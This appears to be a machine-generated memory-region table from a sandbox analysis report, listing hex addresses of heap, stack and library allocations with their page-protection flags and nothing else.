31C0000
|
trusted library allocation
|
page read and write
|
||
7485000
|
heap
|
page execute and read and write
|
||
501C000
|
trusted library allocation
|
page read and write
|
||
7600000
|
trusted library allocation
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
7780000
|
trusted library allocation
|
page read and write
|
||
7BA6000
|
heap
|
page read and write
|
||
55C4000
|
heap
|
page read and write
|
||
2F7C000
|
trusted library allocation
|
page read and write
|
||
611C000
|
trusted library allocation
|
page read and write
|
||
A621000
|
trusted library allocation
|
page read and write
|
||
301D000
|
trusted library allocation
|
page execute and read and write
|
||
36D0000
|
heap
|
page read and write
|
||
76D8000
|
heap
|
page read and write
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
6785000
|
heap
|
page read and write
|
||
8DB000
|
heap
|
page read and write
|
||
492C000
|
stack
|
page read and write
|
||
34F3000
|
heap
|
page read and write
|
||
6F65000
|
heap
|
page execute and read and write
|
||
6E6F000
|
stack
|
page read and write
|
||
71E6000
|
direct allocation
|
page read and write
|
||
7AC0000
|
trusted library allocation
|
page read and write
|
||
2F68000
|
trusted library allocation
|
page read and write
|
||
726E000
|
stack
|
page read and write
|
||
7434000
|
heap
|
page read and write
|
||
818000
|
heap
|
page read and write
|
||
6340000
|
trusted library allocation
|
page execute
|
||
7B93000
|
heap
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page execute and read and write
|
||
5B3E000
|
stack
|
page read and write
|
||
6795000
|
heap
|
page read and write
|
||
37A0000
|
heap
|
page read and write
|
||
30A0000
|
trusted library allocation
|
page read and write
|
||
514B000
|
trusted library allocation
|
page read and write
|
||
565F000
|
heap
|
page read and write
|
||
352A000
|
trusted library allocation
|
page execute and read and write
|
||
87C000
|
heap
|
page read and write
|
||
7770000
|
trusted library allocation
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
4D1F000
|
stack
|
page read and write
|
||
741E000
|
stack
|
page read and write
|
||
5468000
|
heap
|
page read and write
|
||
7220000
|
heap
|
page read and write
|
||
6A13000
|
heap
|
page read and write
|
||
7461000
|
heap
|
page read and write
|
||
748D000
|
heap
|
page read and write
|
||
611C000
|
trusted library allocation
|
page read and write
|
||
6799000
|
heap
|
page read and write
|
||
84BD000
|
stack
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
859E000
|
stack
|
page read and write
|
||
322E000
|
heap
|
page read and write
|
||
5F4E000
|
heap
|
page read and write
|
||
65A8000
|
trusted library allocation
|
page read and write
|
||
65A0000
|
trusted library allocation
|
page read and write
|
||
5E83000
|
heap
|
page read and write
|
||
C621000
|
trusted library allocation
|
page read and write
|
||
869E000
|
direct allocation
|
page read and write
|
||
56C7000
|
heap
|
page read and write
|
||
66FF000
|
heap
|
page read and write
|
||
4EA2000
|
trusted library allocation
|
page read and write
|
||
8AEC000
|
heap
|
page read and write
|
||
112A000
|
trusted library allocation
|
page execute and read and write
|
||
8DB000
|
heap
|
page read and write
|
||
347E000
|
heap
|
page read and write
|
||
76BE000
|
stack
|
page read and write
|
||
4E28000
|
trusted library allocation
|
page read and write
|
||
332E000
|
stack
|
page read and write
|
||
8A8000
|
heap
|
page read and write
|
||
885000
|
heap
|
page read and write
|
||
BDC000
|
stack
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
31A5000
|
trusted library allocation
|
page execute and read and write
|
||
9D0000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
4ECB000
|
heap
|
page read and write
|
||
3530000
|
trusted library allocation
|
page read and write
|
||
607C000
|
heap
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
8DB000
|
heap
|
page read and write
|
||
5261000
|
trusted library allocation
|
page read and write
|
||
6A32000
|
heap
|
page read and write
|
||
5618000
|
heap
|
page read and write
|
||
6775000
|
heap
|
page read and write
|
||
7724000
|
trusted library allocation
|
page read and write
|
||
515E000
|
trusted library allocation
|
page read and write
|
||
364D000
|
heap
|
page read and write
|
||
52F6000
|
trusted library allocation
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
33EE000
|
unkown
|
page read and write
|
||
55D9000
|
heap
|
page read and write
|
||
5DA9000
|
trusted library allocation
|
page read and write
|
||
6A20000
|
heap
|
page read and write
|
||
1020000
|
heap
|
page read and write
|
||
56ED000
|
heap
|
page read and write
|
||
4A50000
|
heap
|
page read and write
|
||
5A3E000
|
trusted library allocation
|
page read and write
|
||
6111000
|
trusted library allocation
|
page read and write
|
||
7B20000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
538E000
|
stack
|
page read and write
|
||
33CC000
|
stack
|
page read and write
|
||
3EA9000
|
trusted library allocation
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
32A2000
|
heap
|
page read and write
|
||
4E01000
|
trusted library allocation
|
page read and write
|
||
5255000
|
trusted library allocation
|
page read and write
|
||
9FD1000
|
trusted library allocation
|
page read and write
|
||
600A000
|
heap
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
3790000
|
trusted library allocation
|
page read and write
|
||
6742000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
484F000
|
heap
|
page read and write
|
||
34AE000
|
stack
|
page read and write
|
||
724C000
|
stack
|
page read and write
|
||
59BE000
|
stack
|
page read and write
|
||
73F0000
|
heap
|
page read and write
|
||
3E89000
|
trusted library allocation
|
page read and write
|
||
5489000
|
heap
|
page read and write
|
||
56C0000
|
heap
|
page read and write
|
||
3480000
|
heap
|
page read and write
|
||
34E0000
|
heap
|
page read and write
|
||
6772000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
3210000
|
heap
|
page read and write
|
||
1239000
|
heap
|
page read and write
|
||
66F7000
|
heap
|
page read and write
|
||
66FF000
|
heap
|
page read and write
|
||
641F000
|
trusted library allocation
|
page read and write
|
||
865000
|
heap
|
page read and write
|
||
3420000
|
heap
|
page read and write
|
||
5AF0000
|
heap
|
page read and write
|
||
31CD000
|
heap
|
page read and write
|
||
598E000
|
stack
|
page read and write
|
||
3000000
|
trusted library allocation
|
page read and write
|
||
611E000
|
trusted library allocation
|
page read and write
|
||
4FA7000
|
heap
|
page read and write
|
||
739D000
|
stack
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
49B4000
|
heap
|
page read and write
|
||
7702000
|
heap
|
page read and write
|
||
8C60000
|
trusted library allocation
|
page execute and read and write
|
||
8AC8000
|
heap
|
page read and write
|
||
72DA000
|
stack
|
page read and write
|
||
76A0000
|
trusted library allocation
|
page read and write
|
||
561B000
|
heap
|
page read and write
|
||
85FE000
|
stack
|
page read and write
|
||
6795000
|
heap
|
page read and write
|
||
5E11000
|
heap
|
page read and write
|
||
73E0000
|
heap
|
page read and write
|
||
857F000
|
stack
|
page read and write
|
||
77A0000
|
heap
|
page read and write
|
||
7F468000
|
trusted library allocation
|
page execute and read and write
|
||
2D2C000
|
stack
|
page read and write
|
||
701E000
|
stack
|
page read and write
|
||
49DE000
|
stack
|
page read and write
|
||
52EA000
|
trusted library allocation
|
page read and write
|
||
601F000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
6004000
|
heap
|
page read and write
|
||
749E000
|
heap
|
page read and write
|
||
3215000
|
heap
|
page read and write
|
||
6500000
|
trusted library allocation
|
page read and write
|
||
5540000
|
heap
|
page execute and read and write
|
||
6115000
|
trusted library allocation
|
page read and write
|
||
561B000
|
heap
|
page read and write
|
||
611A000
|
trusted library allocation
|
page read and write
|
||
5E44000
|
trusted library allocation
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
510C000
|
trusted library allocation
|
page read and write
|
||
335E000
|
stack
|
page read and write
|
||
5595000
|
heap
|
page read and write
|
||
3598000
|
heap
|
page read and write
|
||
53FA000
|
stack
|
page read and write
|
||
2F8F000
|
trusted library allocation
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
89F0000
|
trusted library allocation
|
page read and write
|
||
72DF000
|
stack
|
page read and write
|
||
34B5000
|
heap
|
page read and write
|
||
4C7E000
|
stack
|
page read and write
|
||
920000
|
heap
|
page read and write
|
||
731D000
|
stack
|
page read and write
|
||
6780000
|
heap
|
page read and write
|
||
124E000
|
heap
|
page read and write
|
||
1090000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
5617000
|
heap
|
page read and write
|
||
6023000
|
heap
|
page read and write
|
||
55BF000
|
stack
|
page read and write
|
||
3043000
|
trusted library allocation
|
page execute and read and write
|
||
34D0000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
34DD000
|
heap
|
page read and write
|
||
56C1000
|
heap
|
page read and write
|
||
542D000
|
heap
|
page read and write
|
||
2F81000
|
trusted library allocation
|
page read and write
|
||
56C2000
|
heap
|
page read and write
|
||
31A2000
|
trusted library allocation
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
4844000
|
heap
|
page read and write
|
||
8520000
|
trusted library allocation
|
page read and write
|
||
78D0000
|
trusted library section
|
page read and write
|
||
67E0000
|
heap
|
page read and write
|
||
7B84000
|
heap
|
page read and write
|
||
588A000
|
trusted library allocation
|
page read and write
|
||
52EE000
|
trusted library allocation
|
page read and write
|
||
877000
|
heap
|
page read and write
|
||
7730000
|
trusted library allocation
|
page read and write
|
||
677A000
|
heap
|
page read and write
|
||
608C000
|
heap
|
page read and write
|
||
5018000
|
trusted library allocation
|
page read and write
|
||
340E000
|
stack
|
page read and write
|
||
7C8A000
|
trusted library allocation
|
page read and write
|
||
B4E000
|
stack
|
page read and write
|
||
7790000
|
trusted library allocation
|
page execute and read and write
|
||
56D1000
|
heap
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
746F000
|
heap
|
page read and write
|
||
676A000
|
heap
|
page read and write
|
||
7782000
|
heap
|
page read and write
|
||
E89000
|
heap
|
page read and write
|
||
4D91000
|
trusted library allocation
|
page read and write
|
||
65A0000
|
trusted library allocation
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
7769000
|
heap
|
page read and write
|
||
8E4E000
|
stack
|
page read and write
|
||
7650000
|
trusted library allocation
|
page read and write
|
||
D76000
|
heap
|
page read and write
|
||
34E3000
|
heap
|
page read and write
|
||
739E000
|
stack
|
page read and write
|
||
8DB000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
611E000
|
trusted library allocation
|
page read and write
|
||
34DD000
|
heap
|
page read and write
|
||
601F000
|
heap
|
page read and write
|
||
8DB000
|
heap
|
page read and write
|
||
765A000
|
stack
|
page read and write
|
||
3040000
|
trusted library allocation
|
page read and write
|
||
D00000
|
heap
|
page read and write
|
||
7B29000
|
heap
|
page read and write
|
||
3080000
|
trusted library allocation
|
page read and write
|
||
5380000
|
heap
|
page read and write
|
||
7E80000
|
trusted library allocation
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
3560000
|
trusted library allocation
|
page read and write
|
||
5F49000
|
trusted library allocation
|
page read and write
|
||
61C0000
|
trusted library allocation
|
page read and write
|
||
5612000
|
heap
|
page read and write
|
||
672C000
|
heap
|
page read and write
|
||
7760000
|
trusted library allocation
|
page read and write
|
||
90D000
|
heap
|
page read and write
|
||
6799000
|
heap
|
page read and write
|
||
758E000
|
stack
|
page read and write
|
||
31E0000
|
trusted library allocation
|
page execute and read and write
|
||
4840000
|
heap
|
page read and write
|
||
79EE000
|
stack
|
page read and write
|
||
7710000
|
trusted library allocation
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
81D0000
|
trusted library allocation
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
6020000
|
heap
|
page read and write
|
||
73F0000
|
trusted library allocation
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
6F5E000
|
stack
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
869B000
|
stack
|
page read and write
|
||
767F000
|
stack
|
page read and write
|
||
6480000
|
trusted library allocation
|
page read and write
|
||
52F3000
|
trusted library allocation
|
page read and write
|
||
4E0D000
|
trusted library allocation
|
page read and write
|
||
2F66000
|
trusted library allocation
|
page read and write
|
||
33A0000
|
heap
|
page read and write
|
||
56C2000
|
heap
|
page read and write
|
||
5DB9000
|
trusted library allocation
|
page read and write
|
||
7C16000
|
heap
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
F40000
|
heap
|
page read and write
|
||
DA0000
|
heap
|
page read and write
|
||
6123000
|
heap
|
page read and write
|
||
4CD0000
|
heap
|
page execute and read and write
|
||
81C0000
|
trusted library allocation
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
7250000
|
trusted library allocation
|
page execute and read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
75DE000
|
stack
|
page read and write
|
||
678A000
|
heap
|
page read and write
|
||
54BF000
|
stack
|
page read and write
|
||
4F9B000
|
heap
|
page read and write
|
||
77B0000
|
trusted library allocation
|
page execute and read and write
|
||
3170000
|
heap
|
page read and write
|
||
4EAD000
|
trusted library allocation
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
F1E000
|
stack
|
page read and write
|
||
E3E000
|
stack
|
page read and write
|
||
759E000
|
stack
|
page read and write
|
||
7BAC000
|
heap
|
page read and write
|
||
883000
|
heap
|
page read and write
|
||
F8E000
|
stack
|
page read and write
|
||
71A0000
|
direct allocation
|
page read and write
|
||
6E9E000
|
stack
|
page read and write
|
||
5481000
|
heap
|
page read and write
|
||
10E0000
|
trusted library allocation
|
page read and write
|
||
5ECA000
|
heap
|
page read and write
|
||
4FC000
|
stack
|
page read and write
|
||
611A000
|
trusted library allocation
|
page read and write
|
||
795E000
|
stack
|
page read and write
|
||
560D000
|
heap
|
page read and write
|
||
67A7000
|
heap
|
page read and write
|
||
508E000
|
trusted library allocation
|
page read and write
|
||
6D09000
|
trusted library allocation
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
3212000
|
heap
|
page read and write
|
||
3408000
|
heap
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
7D3F000
|
stack
|
page read and write
|
||
788000
|
heap
|
page read and write
|
||
56C8000
|
heap
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
34B7000
|
heap
|
page read and write
|
||
67BC000
|
heap
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
331F000
|
stack
|
page read and write
|
||
66F2000
|
heap
|
page read and write
|
||
70AA000
|
stack
|
page read and write
|
||
7CB0000
|
heap
|
page execute and read and write
|
||
77E0000
|
heap
|
page read and write
|
||
D8E000
|
stack
|
page read and write
|
||
67A7000
|
heap
|
page read and write
|
||
5ECB000
|
heap
|
page read and write
|
||
74BB000
|
trusted library allocation
|
page read and write
|
||
6044000
|
heap
|
page read and write
|
||
672D000
|
heap
|
page read and write
|
||
4A30000
|
heap
|
page read and write
|
||
601C000
|
heap
|
page read and write
|
||
111D000
|
trusted library allocation
|
page execute and read and write
|
||
3510000
|
trusted library allocation
|
page read and write
|
||
55F0000
|
heap
|
page read and write
|
||
5302000
|
trusted library allocation
|
page read and write
|
||
7679000
|
heap
|
page read and write
|
||
7CFE000
|
stack
|
page read and write
|
||
76FD000
|
stack
|
page read and write
|
||
3570000
|
heap
|
page readonly
|
||
6600000
|
trusted library allocation
|
page execute and read and write
|
||
4C3E000
|
stack
|
page read and write
|
||
6580000
|
trusted library allocation
|
page read and write
|
||
6765000
|
heap
|
page read and write
|
||
86E000
|
heap
|
page read and write
|
||
7770000
|
heap
|
page read and write
|
||
6A03000
|
heap
|
page read and write
|
||
666F000
|
heap
|
page read and write
|
||
549D000
|
heap
|
page read and write
|
||
56EE000
|
heap
|
page read and write
|
||
87E000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
65F0000
|
heap
|
page read and write
|
||
54BC000
|
stack
|
page read and write
|
||
55C1000
|
heap
|
page read and write
|
||
719D000
|
stack
|
page read and write
|
||
7512000
|
heap
|
page read and write
|
||
51D0000
|
trusted library allocation
|
page read and write
|
||
7480000
|
heap
|
page read and write
|
||
66F7000
|
heap
|
page read and write
|
||
37A7000
|
heap
|
page read and write
|
||
8A92000
|
heap
|
page read and write
|
||
E90000
|
heap
|
page read and write
|
||
7620000
|
trusted library allocation
|
page read and write
|
||
6799000
|
heap
|
page read and write
|
||
31AA000
|
heap
|
page read and write
|
||
D4E000
|
stack
|
page read and write
|
||
1160000
|
trusted library allocation
|
page execute and read and write
|
||
90D000
|
heap
|
page read and write
|
||
611A000
|
trusted library allocation
|
page read and write
|
||
750000
|
heap
|
page read and write
|
||
5E85000
|
heap
|
page read and write
|
||
33C0000
|
heap
|
page execute and read and write
|
||
6002000
|
heap
|
page read and write
|
||
35BB000
|
heap
|
page read and write
|
||
7AE0000
|
trusted library allocation
|
page read and write
|
||
4CD5000
|
heap
|
page execute and read and write
|
||
77C0000
|
trusted library allocation
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
769E000
|
stack
|
page read and write
|
||
5480000
|
heap
|
page read and write
|
||
F37000
|
heap
|
page read and write
|
||
E50000
|
heap
|
page read and write
|
||
7260000
|
direct allocation
|
page read and write
|
||
A60E000
|
stack
|
page read and write
|
||
2E70000
|
heap
|
page execute and read and write
|
||
86E000
|
heap
|
page read and write
|
||
54CF000
|
stack
|
page read and write
|
||
326D000
|
heap
|
page read and write
|
||
4EB0000
|
heap
|
page read and write
|
||
894D000
|
stack
|
page read and write
|
||
729E000
|
stack
|
page read and write
|
||
723D000
|
stack
|
page read and write
|
||
706E000
|
stack
|
page read and write
|
||
6F9E000
|
stack
|
page read and write
|
||
553D000
|
stack
|
page read and write
|
||
72CD000
|
stack
|
page read and write
|
||
4FA5000
|
heap
|
page read and write
|
||
342E000
|
unkown
|
page read and write
|
||
5560000
|
trusted library allocation
|
page read and write
|
||
6795000
|
heap
|
page read and write
|
||
95D1000
|
trusted library allocation
|
page read and write
|
||
744D000
|
heap
|
page read and write
|
||
6D6E000
|
stack
|
page read and write
|
||
3410000
|
trusted library allocation
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
64D0000
|
trusted library allocation
|
page read and write
|
||
7DBD000
|
stack
|
page read and write
|
||
5F4E000
|
heap
|
page read and write
|
||
6F60000
|
heap
|
page execute and read and write
|
||
344E000
|
stack
|
page read and write
|
||
710C000
|
stack
|
page read and write
|
||
FE0000
|
heap
|
page read and write
|
||
6010000
|
heap
|
page read and write
|
||
331D000
|
stack
|
page read and write
|
||
1104000
|
trusted library allocation
|
page read and write
|
||
31D0000
|
heap
|
page readonly
|
||
D4E000
|
stack
|
page read and write
|
||
2E81000
|
trusted library allocation
|
page read and write
|
||
3EE2000
|
trusted library allocation
|
page read and write
|
||
87D000
|
heap
|
page read and write
|
||
740F000
|
heap
|
page read and write
|
||
31C0000
|
heap
|
page read and write
|
||
66F4000
|
heap
|
page read and write
|
||
74B0000
|
trusted library allocation
|
page read and write
|
||
6022000
|
heap
|
page read and write
|
||
6430000
|
trusted library allocation
|
page read and write
|
||
321E000
|
heap
|
page read and write
|
||
56ED000
|
heap
|
page read and write
|
||
4EB0000
|
trusted library allocation
|
page read and write
|
||
D0E000
|
stack
|
page read and write
|
||
5453000
|
heap
|
page read and write
|
||
504E000
|
trusted library allocation
|
page read and write
|
||
743A000
|
heap
|
page read and write
|
||
483E000
|
stack
|
page read and write
|
||
6660000
|
trusted library allocation
|
page read and write
|
||
4A10000
|
heap
|
page read and write
|
||
81E0000
|
heap
|
page read and write
|
||
1096000
|
heap
|
page read and write
|
||
7240000
|
direct allocation
|
page read and write
|
||
6742000
|
heap
|
page read and write
|
||
55E9000
|
heap
|
page read and write
|
||
3290000
|
heap
|
page read and write
|
||
5497000
|
heap
|
page read and write
|
||
764E000
|
stack
|
page read and write
|
||
5473000
|
heap
|
page read and write
|
||
5DF3000
|
trusted library allocation
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
7750000
|
trusted library allocation
|
page read and write
|
||
3040000
|
trusted library allocation
|
page read and write
|
||
2E50000
|
heap
|
page read and write
|
||
77C0000
|
trusted library allocation
|
page read and write
|
||
31F0000
|
heap
|
page read and write
|
||
33D0000
|
heap
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
3488000
|
heap
|
page read and write
|
||
7630000
|
trusted library allocation
|
page read and write
|
||
86D0000
|
heap
|
page read and write
|
||
85E000
|
heap
|
page read and write
|
||
3045000
|
trusted library allocation
|
page execute and read and write
|
||
3174000
|
trusted library allocation
|
page read and write
|
||
4D5C000
|
stack
|
page read and write
|
||
873000
|
heap
|
page read and write
|
||
6799000
|
heap
|
page read and write
|
||
317D000
|
trusted library allocation
|
page execute and read and write
|
||
3290000
|
heap
|
page read and write
|
||
7640000
|
trusted library allocation
|
page read and write
|
||
6ED5000
|
heap
|
page execute and read and write
|
||
611C000
|
trusted library allocation
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
73B0000
|
heap
|
page read and write
|
||
52C0000
|
trusted library allocation
|
page read and write
|
||
4970000
|
trusted library allocation
|
page read and write
|
||
6015000
|
heap
|
page read and write
|
||
632D000
|
stack
|
page read and write
|
||
7497000
|
heap
|
page read and write
|
||
4F23000
|
heap
|
page read and write
|
||
7DD0000
|
trusted library allocation
|
page execute and read and write
|
||
77A0000
|
trusted library allocation
|
page read and write
|
||
7A30000
|
trusted library allocation
|
page read and write
|
||
84F0000
|
heap
|
page read and write
|
||
3271000
|
heap
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
6773000
|
heap
|
page read and write
|
||
8900000
|
heap
|
page read and write
|
||
6044000
|
heap
|
page read and write
|
||
6738000
|
heap
|
page read and write
|
||
71E0000
|
direct allocation
|
page read and write
|
||
674E000
|
heap
|
page read and write
|
||
8AE4000
|
heap
|
page read and write
|
||
6A2F000
|
heap
|
page read and write
|
||
6FC0000
|
trusted library allocation
|
page read and write
|
||
611E000
|
trusted library allocation
|
page read and write
|
||
8890000
|
trusted library allocation
|
page execute and read and write
|
||
601D000
|
heap
|
page read and write
|
||
5D7F000
|
stack
|
page read and write
|
||
558E000
|
stack
|
page read and write
|
||
C17000
|
heap
|
page read and write
|
||
673F000
|
heap
|
page read and write
|
||
4F7E000
|
stack
|
page read and write
|
||
67A7000
|
heap
|
page read and write
|
||
5590000
|
heap
|
page read and write
|
||
3082000
|
trusted library allocation
|
page read and write
|
||
525F000
|
trusted library allocation
|
page read and write
|
||
8320000
|
trusted library allocation
|
page read and write
|
||
60E4000
|
heap
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
6347000
|
heap
|
page read and write
|
||
3350000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
5714000
|
heap
|
page read and write
|
||
97C000
|
stack
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
363E000
|
stack
|
page read and write
|
||
3450000
|
heap
|
page read and write
|
||
76B0000
|
trusted library allocation
|
page read and write
|
||
5F11000
|
heap
|
page read and write
|
||
3738000
|
trusted library allocation
|
page read and write
|
||
322D000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
4EF7000
|
trusted library allocation
|
page read and write
|
||
605A000
|
heap
|
page read and write
|
||
6949000
|
trusted library allocation
|
page read and write
|
||
7C87000
|
trusted library allocation
|
page read and write
|
||
74C0000
|
heap
|
page execute and read and write
|
||
55C9000
|
heap
|
page read and write
|
||
71AA000
|
stack
|
page read and write
|
||
53CE000
|
stack
|
page read and write
|
||
7E00000
|
trusted library allocation
|
page read and write
|
||
601F000
|
heap
|
page read and write
|
||
B60000
|
heap
|
page read and write
|
||
3503000
|
trusted library allocation
|
page execute and read and write
|
||
2F38000
|
trusted library allocation
|
page read and write
|
||
6117000
|
trusted library allocation
|
page read and write
|
||
E39000
|
stack
|
page read and write
|
||
884000
|
heap
|
page read and write
|
||
73DF000
|
heap
|
page read and write
|
||
84FF000
|
stack
|
page read and write
|
||
576F000
|
trusted library allocation
|
page read and write
|
||
6778000
|
heap
|
page read and write
|
||
6785000
|
heap
|
page read and write
|
||
63E000
|
stack
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
7290000
|
heap
|
page read and write
|
||
E6C1000
|
trusted library allocation
|
page read and write
|
||
86A000
|
heap
|
page read and write
|
||
496E000
|
stack
|
page read and write
|
||
56C7000
|
heap
|
page read and write
|
||
735B000
|
stack
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
EDD000
|
stack
|
page read and write
|
||
745E000
|
stack
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
4A1E000
|
stack
|
page read and write
|
||
67A7000
|
heap
|
page read and write
|
||
34FC000
|
heap
|
page read and write
|
||
578E000
|
trusted library allocation
|
page read and write
|
||
61CF000
|
trusted library allocation
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
5151000
|
trusted library allocation
|
page read and write
|
||
7A80000
|
trusted library allocation
|
page read and write
|
||
7693000
|
trusted library allocation
|
page read and write
|
||
8DB000
|
heap
|
page read and write
|
||
119A000
|
heap
|
page read and write
|
||
6360000
|
trusted library allocation
|
page read and write
|
||
7F450000
|
trusted library allocation
|
page execute and read and write
|
||
7E90000
|
trusted library allocation
|
page read and write
|
||
678A000
|
heap
|
page read and write
|
||
75F0000
|
trusted library allocation
|
page execute and read and write
|
||
676A000
|
heap
|
page read and write
|
||
677A000
|
heap
|
page read and write
|
||
6A02000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
BBA000
|
stack
|
page read and write
|
||
8530000
|
trusted library allocation
|
page read and write
|
||
6400000
|
trusted library allocation
|
page read and write
|
||
8690000
|
direct allocation
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
66F7000
|
heap
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
7880000
|
heap
|
page execute and read and write
|
||
6046000
|
heap
|
page read and write
|
||
4FA7000
|
heap
|
page read and write
|
||
6701000
|
heap
|
page read and write
|
||
6F2D000
|
stack
|
page read and write
|
||
6799000
|
heap
|
page read and write
|
||
65E1000
|
heap
|
page read and write
|
||
34E3000
|
heap
|
page read and write
|
||
74B2000
|
trusted library allocation
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
4FA5000
|
heap
|
page read and write
|
||
6437000
|
trusted library allocation
|
page read and write
|
||
7A60000
|
trusted library allocation
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
79AE000
|
stack
|
page read and write
|
||
7670000
|
trusted library allocation
|
page read and write
|
||
6772000
|
heap
|
page read and write
|
||
5C3E000
|
stack
|
page read and write
|
||
F0B000
|
heap
|
page read and write
|
||
543D000
|
heap
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
6EC0000
|
heap
|
page execute and read and write
|
||
3274000
|
heap
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
8880000
|
heap
|
page read and write
|
||
1178000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
4FA7000
|
heap
|
page read and write
|
||
3520000
|
trusted library allocation
|
page read and write
|
||
86E000
|
heap
|
page read and write
|
||
6116000
|
trusted library allocation
|
page read and write
|
||
746D000
|
heap
|
page read and write
|
||
579E000
|
stack
|
page read and write
|
||
86E0000
|
heap
|
page read and write
|
||
345C000
|
heap
|
page read and write
|
||
543E000
|
heap
|
page read and write
|
||
F6C000
|
stack
|
page read and write
|
||
60B0000
|
heap
|
page read and write
|
||
6126000
|
trusted library allocation
|
page read and write
|
||
3590000
|
heap
|
page read and write
|
||
35FE000
|
stack
|
page read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
1000000
|
heap
|
page read and write
|
||
678A000
|
heap
|
page read and write
|
||
60DF000
|
heap
|
page read and write
|
||
73F2000
|
heap
|
page read and write
|
||
52FD000
|
trusted library allocation
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
8A50000
|
heap
|
page read and write
|
||
605A000
|
heap
|
page read and write
|
||
316E000
|
stack
|
page read and write
|
||
5F9C000
|
heap
|
page read and write
|
||
31A0000
|
heap
|
page read and write
|
||
605A000
|
heap
|
page read and write
|
||
7B10000
|
trusted library allocation
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
79DE000
|
stack
|
page read and write
|
||
666F000
|
heap
|
page read and write
|
||
4D80000
|
heap
|
page read and write
|
||
DA7000
|
heap
|
page read and write
|
||
76C0000
|
trusted library allocation
|
page read and write
|
||
852000
|
heap
|
page read and write
|
||
4CBE000
|
stack
|
page read and write
|
||
11A8000
|
heap
|
page read and write
|
||
55E4000
|
heap
|
page read and write
|
||
611C000
|
trusted library allocation
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
6990000
|
heap
|
page read and write
|
||
7B99000
|
heap
|
page read and write
|
||
86D7000
|
heap
|
page read and write
|
||
4DF3000
|
trusted library allocation
|
page read and write
|
||
4E47000
|
trusted library allocation
|
page read and write
|
||
678A000
|
heap
|
page read and write
|
||
861000
|
heap
|
